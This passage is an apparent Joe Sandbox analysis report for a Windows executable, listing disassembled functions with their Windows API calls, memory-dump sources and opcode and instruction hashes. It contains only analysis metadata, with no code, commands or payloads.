                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                        • String ID:
                                                        • API String ID: 666041331-0
                                                        • Opcode ID: 849a1d403005cfad01b01d568cf0ee6ddc61547a6203fa80b6a516913951b69a
                                                        • Instruction ID: b34f13c03f90bb82b656f37221b207b2a2d6edb3d292142e5c52b65def202769
                                                        • Opcode Fuzzy Hash: 849a1d403005cfad01b01d568cf0ee6ddc61547a6203fa80b6a516913951b69a
                                                        • Instruction Fuzzy Hash: AC514B34601209DFCB15DF58C4949ADBBF1FF59324B05D099E90AAB362DB31ED85CBA0
                                                        Function 00E86B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00E86C33
                                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00E86C4A
                                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00E86C73
                                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E6AB79,00000000,00000000), ref: 00E86C98
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00E86CC7
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MessageSendShow
                                                        • String ID:
                                                        • API String ID: 3688381893-0
                                                        • Opcode ID: a6181a3306fff124d172250fe84d531b63d33faa2e0a93d3c8ab390ef052aa3c
                                                        • Instruction ID: fc32a0006f7f1ad7bd205df10788ad015e193384df57540dd1bc1a8132ea1efe
                                                        • Opcode Fuzzy Hash: a6181a3306fff124d172250fe84d531b63d33faa2e0a93d3c8ab390ef052aa3c
                                                        • Instruction Fuzzy Hash: B441C135A04104AFDB24EF29CC58FA9BBA5EB4A354F151268F89DB72E0C371ED41DB50
                                                        Function 00E22051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 0108bb96d15b2517e9921e4dc6c1675a3c72605057fc20723d12a379bb8a2a20
                                                        • Instruction ID: fa6d9294723a44a55ad18cbdf8ead114afb08952d5c2a8adffb08e715f0bd92a
                                                        • Opcode Fuzzy Hash: 0108bb96d15b2517e9921e4dc6c1675a3c72605057fc20723d12a379bb8a2a20
                                                        • Instruction Fuzzy Hash: CA41E132A00210AFCB24DF78D880A5EB3E5EF88314F2545ACEA15FB391DB31AD01CB81
                                                        Function 00E0912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00E09141
                                                        • ScreenToClient.USER32(00000000,?), ref: 00E0915E
                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E09183
                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E0919D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: d61cc920f425fdec1cc8fadaea7333ef42d305c0b9a07be4eaefc857c118ce62
                                                        • Instruction ID: d1144c457556a482825a39d45d9786856dc878bff1052c6dc5d297fe3b4e8ae9
                                                        • Opcode Fuzzy Hash: d61cc920f425fdec1cc8fadaea7333ef42d305c0b9a07be4eaefc857c118ce62
                                                        • Instruction Fuzzy Hash: 82419D71A0921AFBDF059F64D848BEEB7B4FF05324F209219E469B32D2C7306994CB91
                                                        Function 00E63874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetInputState.USER32 ref: 00E638CB
                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E63922
                                                        • TranslateMessage.USER32(?), ref: 00E6394B
                                                        • DispatchMessageW.USER32(?), ref: 00E63955
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E63966
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                        • String ID:
                                                        • API String ID: 2256411358-0
                                                        • Opcode ID: 87a6bb74a0a3e30166906b083cfe514643c4adb10ec1d7b8de004729c301061b
                                                        • Instruction ID: fb37341e2933e6fef8e75fde59312bd14d8c45d733d814d8f6c99c647554e153
                                                        • Opcode Fuzzy Hash: 87a6bb74a0a3e30166906b083cfe514643c4adb10ec1d7b8de004729c301061b
                                                        • Instruction Fuzzy Hash: 6E31F9705843419EEB39CB35F808FF637A4EB42388F14156DE456B20D5D3B19689CF21
                                                        Function 00E6CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E6C21E,00000000), ref: 00E6CF38
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00E6CF6F
                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00E6C21E,00000000), ref: 00E6CFB4
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E6C21E,00000000), ref: 00E6CFC8
                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E6C21E,00000000), ref: 00E6CFF2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 3191363074-0
                                                        • Opcode ID: e31ad9fdb298b846707850cd30e15d454d92bfe29603c7d99d383dfde0a1c4ac
                                                        • Instruction ID: e63f625055c9067a9a3c749889b0729f52af66ed9409a64e19b74f48d104d3da
                                                        • Opcode Fuzzy Hash: e31ad9fdb298b846707850cd30e15d454d92bfe29603c7d99d383dfde0a1c4ac
                                                        • Instruction Fuzzy Hash: 3D31A071640205EFDB20DFA5E884ABBBBF9EB14394B20542EF156F2151D730AD41DB60
                                                        Function 00E51901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00E51915
                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E519C1
                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 00E519C9
                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E519DA
                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E519E2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 86347441ee7aa58de2a6479bbec65d9a0a6683bea5ef2e66c9d2dfbedbbb0a2c
                                                        • Instruction ID: d0d4977497e75c28b8aa0870ae72099550e0902f9453b775a2f745af27fba65d
                                                        • Opcode Fuzzy Hash: 86347441ee7aa58de2a6479bbec65d9a0a6683bea5ef2e66c9d2dfbedbbb0a2c
                                                        • Instruction Fuzzy Hash: 0031CF71900219EFCB00CFA8C998BDE3BB5EB45315F105669FD25A72D1C3709948DB91
                                                        Function 00E85706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E85745
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E8579D
                                                        • _wcslen.LIBCMT ref: 00E857AF
                                                        • _wcslen.LIBCMT ref: 00E857BA
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E85816
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen
                                                        • String ID:
                                                        • API String ID: 763830540-0
                                                        • Opcode ID: d42f085cc9a04dd461979d44e80820bc7c43a9741d600cfad8cad1a8ccc5359d
                                                        • Instruction ID: ec56573847e3f5904e20c69aa400f78ed429bfd95dae12af9256b444cc28eca7
                                                        • Opcode Fuzzy Hash: d42f085cc9a04dd461979d44e80820bc7c43a9741d600cfad8cad1a8ccc5359d
                                                        • Instruction Fuzzy Hash: 8521A572904618DADB20AFA0CC84AEDB7B8FF45724F109266F92DFA1D0DB708985CF51
                                                        Function 00E70930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindow.USER32(00000000), ref: 00E70951
                                                        • GetForegroundWindow.USER32 ref: 00E70968
                                                        • GetDC.USER32(00000000), ref: 00E709A4
                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00E709B0
                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00E709E8
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ForegroundPixelRelease
                                                        • String ID:
                                                        • API String ID: 4156661090-0
                                                        • Opcode ID: 9a8a38a4ea2984a32ae2ee6455355cec5615ed062d7d99b3dd5e7c59a72efad7
                                                        • Instruction ID: 61d91c2c9e5334ce9e9cc53cdf8a3601fd661b750748f6d6e8b1d7bc9bb0e9cc
                                                        • Opcode Fuzzy Hash: 9a8a38a4ea2984a32ae2ee6455355cec5615ed062d7d99b3dd5e7c59a72efad7
                                                        • Instruction Fuzzy Hash: 42218135600204EFD704EF65D984AAEBBF5EF85740F148069E94AA7362DB30AC04DBA0
                                                        Function 00E2CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00E2CDC6
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E2CDE9
                                                          • Part of subcall function 00E23820: RtlAllocateHeap.NTDLL(00000000,?,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6,?,00DF1129), ref: 00E23852
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E2CE0F
                                                        • _free.LIBCMT ref: 00E2CE22
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E2CE31
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: d8f1b4372eeac7311bef77aff4404e50ea83590d6416b9331da6d14cbe96c977
                                                        • Instruction ID: 7bbad718ac44f84010834cf2976bce9c98160eabc9faa02241e4f5b9280d2e3e
                                                        • Opcode Fuzzy Hash: d8f1b4372eeac7311bef77aff4404e50ea83590d6416b9331da6d14cbe96c977
                                                        • Instruction Fuzzy Hash: 100171726026257F232116B6BC8CD7F6A6DDAC7BA53361129F909E7201EA618D0282B1
                                                        Function 00E09639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E09693
                                                        • SelectObject.GDI32(?,00000000), ref: 00E096A2
                                                        • BeginPath.GDI32(?), ref: 00E096B9
                                                        • SelectObject.GDI32(?,00000000), ref: 00E096E2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 1e56ce017e70ad0fd58acc38119afb3d6d1e1fbdab12044cb48aac3f989702f7
                                                        • Instruction ID: 799407e632f1cae6227d37d9485230f24bdcd8d473bdef2b641fa9420689b5f2
                                                        • Opcode Fuzzy Hash: 1e56ce017e70ad0fd58acc38119afb3d6d1e1fbdab12044cb48aac3f989702f7
                                                        • Instruction Fuzzy Hash: 26216070802305EFDB119F66FC08BAD3BB4BB82759F100266F414B61E3D372989ACB90
                                                        Function 00E55711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: 07a6f1e305728f62ddbaf0d7b3b70f774bd09d6a19ed56ab9a1ed1b8d90cf37c
                                                        • Instruction ID: ada2cfa712e72f97a0d97f280253f3af7a9d7468fd9089aa6fc36f669565bd2f
                                                        • Opcode Fuzzy Hash: 07a6f1e305728f62ddbaf0d7b3b70f774bd09d6a19ed56ab9a1ed1b8d90cf37c
                                                        • Instruction Fuzzy Hash: 7901F573641709FBD20862119D92FFB739C9B2439AF112422FE0DBA241F720EE6483A0
                                                        Function 00E22DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00E1F2DE,00E23863,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6), ref: 00E22DFD
                                                        • _free.LIBCMT ref: 00E22E32
                                                        • _free.LIBCMT ref: 00E22E59
                                                        • SetLastError.KERNEL32(00000000,00DF1129), ref: 00E22E66
                                                        • SetLastError.KERNEL32(00000000,00DF1129), ref: 00E22E6F
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 2fdd34e41f6ec24e948339b398dc85b8e4355de27dc4e09dce6f0a0457c0aa0e
                                                        • Instruction ID: 1b1029cebc8a928db5d929c98e7cc3d05b896116327b2462eb66677cad52f845
                                                        • Opcode Fuzzy Hash: 2fdd34e41f6ec24e948339b398dc85b8e4355de27dc4e09dce6f0a0457c0aa0e
                                                        • Instruction Fuzzy Hash: A001F9322056207BC61327357C46D7B16ADABD5765B36612CF615B21D2EE74CC066120
                                                        Function 00E5000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?,?,00E5035E), ref: 00E5002B
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?), ref: 00E50046
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?), ref: 00E50054
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?), ref: 00E50064
                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E4FF41,80070057,?,?), ref: 00E50070
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: b56131c40a762cf8bf4eaacec8adff12511bc30582807a8499e9e4ab1fd70391
                                                        • Instruction ID: 63afcc0a239295554c98d2ba92461485e054be6dc6299370a30bfc6785a528ef
                                                        • Opcode Fuzzy Hash: b56131c40a762cf8bf4eaacec8adff12511bc30582807a8499e9e4ab1fd70391
                                                        • Instruction Fuzzy Hash: 7C01AD72600204BFDB154F6ADC04BAA7AEDEF44792F245924FD09F2250E771ED489BA0
                                                        Function 00E510F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E51114
                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51120
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E5112F
                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E50B9B,?,?,?), ref: 00E51136
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5114D
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: 1853ef77edb2491532181b21b2038c88f8999b1b62b7e87c11f5a19d38b6f9da
                                                        • Instruction ID: 37c8643eb72c6dbb620b5745ad467dbdceead712d7058455f31f9f9384eb816a
                                                        • Opcode Fuzzy Hash: 1853ef77edb2491532181b21b2038c88f8999b1b62b7e87c11f5a19d38b6f9da
                                                        • Instruction Fuzzy Hash: 85016D75101605BFDB114FA5EC4DA6A3B6EEF86365B210455FA45E3360DB31DC448F70
                                                        Function 00E50FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E50FCA
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E50FD6
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E50FE5
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E50FEC
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E51002
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
